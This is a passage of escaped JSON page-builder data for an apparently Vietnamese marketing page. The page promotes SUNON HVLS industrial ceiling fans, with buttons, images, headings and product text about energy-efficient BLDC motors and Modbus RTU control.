20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_6\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">WALL INDUSTRIAL HVLS\\u00a0 FANS<\\/span>\\\",\\\"calculatedWidth\\\":238,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"lHdM6A5mmE\\\",\\\"contents\\\":[{\\\"id\\\":\\\"QnRZ7TOjY6\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#169179\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_10\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">PORTABLE INDUSTRIAL HVLS FANS<\\/span>\\\",\\\"calculatedWidth\\\":266,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\">Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng m\\u1ea1nh m\\u1ebd, th\\u1ed5i m\\u1ea1nh m\\u1ebd, ph\\u00f9 h\\u1ee3p \\u0111\\u1ec3 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ed1i l\\u01b0u trong kh\\u00f4ng gian r\\u1ed9ng, gi\\u00fap gi\\u1ea3m nhi\\u1ec7t \\u0111\\u1ed9 r\\u00f5 r\\u00e0ng m\\u1ed9t c\\u00e1ch hi\\u1ec7u qu\\u1ea3 v\\u00e0 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ec1u. V\\u1edbi vi\\u1ec7c s\\u1eed d\\u1ee5ng \\u0111\\u1ed9ng c\\u01a1 truy\\u1ec1n \\u0111\\u1ed9ng tr\\u1ef1c ti\\u1ebfp BLDC hi\\u1ec7u su\\u1ea5t cao, d\\u00f2ng qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p m\\u1ea1nh m\\u1ebd c\\u1ee7a ch\\u00fang t\\u00f4i c\\u00f3 th\\u1ec3 ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng \\u0111\\u00e1ng k\\u1ec3 do s\\u1eed \\u0111\\u1ed9ng c\\u01a1 t\\u1eeb nam ch\\u00e2m do ch\\u00ednh SUNON thi\\u1ebft k\\u1ebf c\\u00f3 h\\u01a1n 40 n\\u0103m kinh nghi\\u1ec7m s\\u1ea3n xu\\u1ea5t v\\u00e0 nghi\\u00ean c\\u1ee9u. B\\u00ean c\\u1ea1nh \\u0111\\u00f3, d\\u00f2ng \\u0111\\u1ed9ng c\\u01a1 n\\u00e0y duy tr\\u00ec \\u0111\\u1ed9 b\\u1ec1n t\\u1ed1t m\\u00e0 kh\\u00f4ng c\\u1ea7n thay d\\u1ea7u th\\u01b0\\u1eddng xuy\\u00ean, cho ph\\u00e9p n\\u00f3 tr\\u1edf th\\u00e0nh s\\u1ef1 l\\u1ef1a ch\\u1ecdn hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t v\\u1ec1 chi ph\\u00ed \\u0111\\u1ec3 \\u0111\\u1ea7u t\\u01b0 l\\u00e2u d\\u00e0i v\\u00e0o h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u h\\u00f2a kh\\u00f4ng kh\\u00ed th\\u01b0\\u01a1ng m\\u1ea1i.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"-tv4jVob68\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167302539-Powerful3-02.jpeg\\\",\\\"width\\\":1201,\\\"height\\\":501},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"GpbXCoaBvd\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_7\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Powerful HVLS Fan series 3\\\"}},{\\\"id\\\":\\\"pPC5Z1Ik_1\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167903786-HVLS10-02.jpg\\\",\\\"width\\\":1201,\\\"height\\\":501},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_14\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"XXN260hCS3\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_6\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Powerful HVLS Fan series 10\\\"}},{\\\"id\\\":\\\"3vM6it4cB4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\">Kh\\u00e1c v\\u1edbi h\\u1ea7u h\\u1ebft c\\u00e1c qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn tr\\u00ean th\\u1ecb tr\\u01b0\\u1eddng d\\u1ef1a v\\u00e0o t\\u1ed1c \\u0111\\u1ed9 quay nhanh \\u0111\\u1ec3 t\\u1ea1o ra lu\\u1ed3ng kh\\u00f4ng kh\\u00ed kh\\u00f4ng \\u1ed5n \\u0111\\u1ecbnh v\\u00e0 kh\\u00f4ng \\u0111\\u1ed3ng \\u0111\\u1ec1u, Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn HVLS Fan series 10 s\\u1eed d\\u1ee5ng kh\\u1ea3 n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n \\u0111\\u1ed9ng c\\u01a1 v\\u01b0\\u1ee3t tr\\u1ed9i \\u0111\\u1ec3 t\\u1ea1o ra gi\\u00f3 \\u0111\\u1ec1u v\\u00e0 nh\\u1eb9.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"3XywiR4X-b\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167720431-Powerful3-12.jpeg\\\",\\\"width\\\":1201,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"e-hJ3MnqLx\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680168052836-overhead_fans_commercia.jpg\\\",\\\"width\\\":1920,\\\"height\\\":889},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e03e2d\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM - V\\u1ec0 SUNON<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":246,\\\"calculatedHeight\\\":47},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"fhAyvauViK\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"4l6DIuGJqW\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_5\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110I\\u1ec0U KHI\\u1ec2N TI\\u1ec6N \\u00cdCH - TH\\u00d4NG MINH\\\"}},{\\\"id\\\":\\\"_K40u5XnIY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n c\\u1ee7a qu\\u1ea1t SUNON. N\\u1ebfu b\\u1ea1n c\\u1ea7n m\\u1ee9c \\u0111\\u1ed9 qu\\u1ea3n l\\u00fd t\\u1eadp trung th\\u00f4ng qua Modbus - nh\\u01b0 l\\u00e0 m\\u1ed9t ph\\u01b0\\u01a1ng th\\u1ee9c qu\\u1ea3n l\\u00fd t\\u1eadp trung khi c\\u00f3 qu\\u00e1 nhi\\u1ec1u qu\\u1ea1t c\\u1ea7n qu\\u1ea3n l\\u00fd d\\u1ec5 d\\u00e0ng v\\u00e0 thu\\u1eadn ti\\u1ec7n. H\\u00e3y li\\u00ean h\\u1ec7 v\\u1edbi ch\\u00fang t\\u00f4i !<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">SUNON HVLS cung c\\u1ea5p gi\\u1ea3i ph\\u00e1p qu\\u1ea3n l\\u00fd Modbus th\\u00f4ng qua giao th\\u1ee9c chu\\u1ea9n c\\u00f4ng nghi\\u1ec7p RTU<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">Modbus RTU - \\u0111\\u00e2y l\\u00e0 m\\u1ed9t giao th\\u1ee9c \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng r\\u1ed9ng r\\u00e3i trong nhi\\u1ec1u l\\u0129nh v\\u1ef1c nh\\u01b0 BMS (Building Management Systems), t\\u1ef1 \\u0111\\u1ed9ng h\\u00f3a, c\\u00f4ng nghi\\u1ec7p<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"lz-ixEIpPZ\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"MJlj9zB0N8\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XiwlcZ22cN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169223539-remote-control.jpg\\\",\\\"width\\\":360,\\\"height\\\":360},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"njYx9-f90X\\\",\\\"contents\\\":[{\\\"id\\\":\\\"RXKox9ErVN\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"y9235nL0ac\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z59_MxupRK\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680169233314-bien-tan.jpg\\\",\\\"width\\\":360,\\\"height\\\":360},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d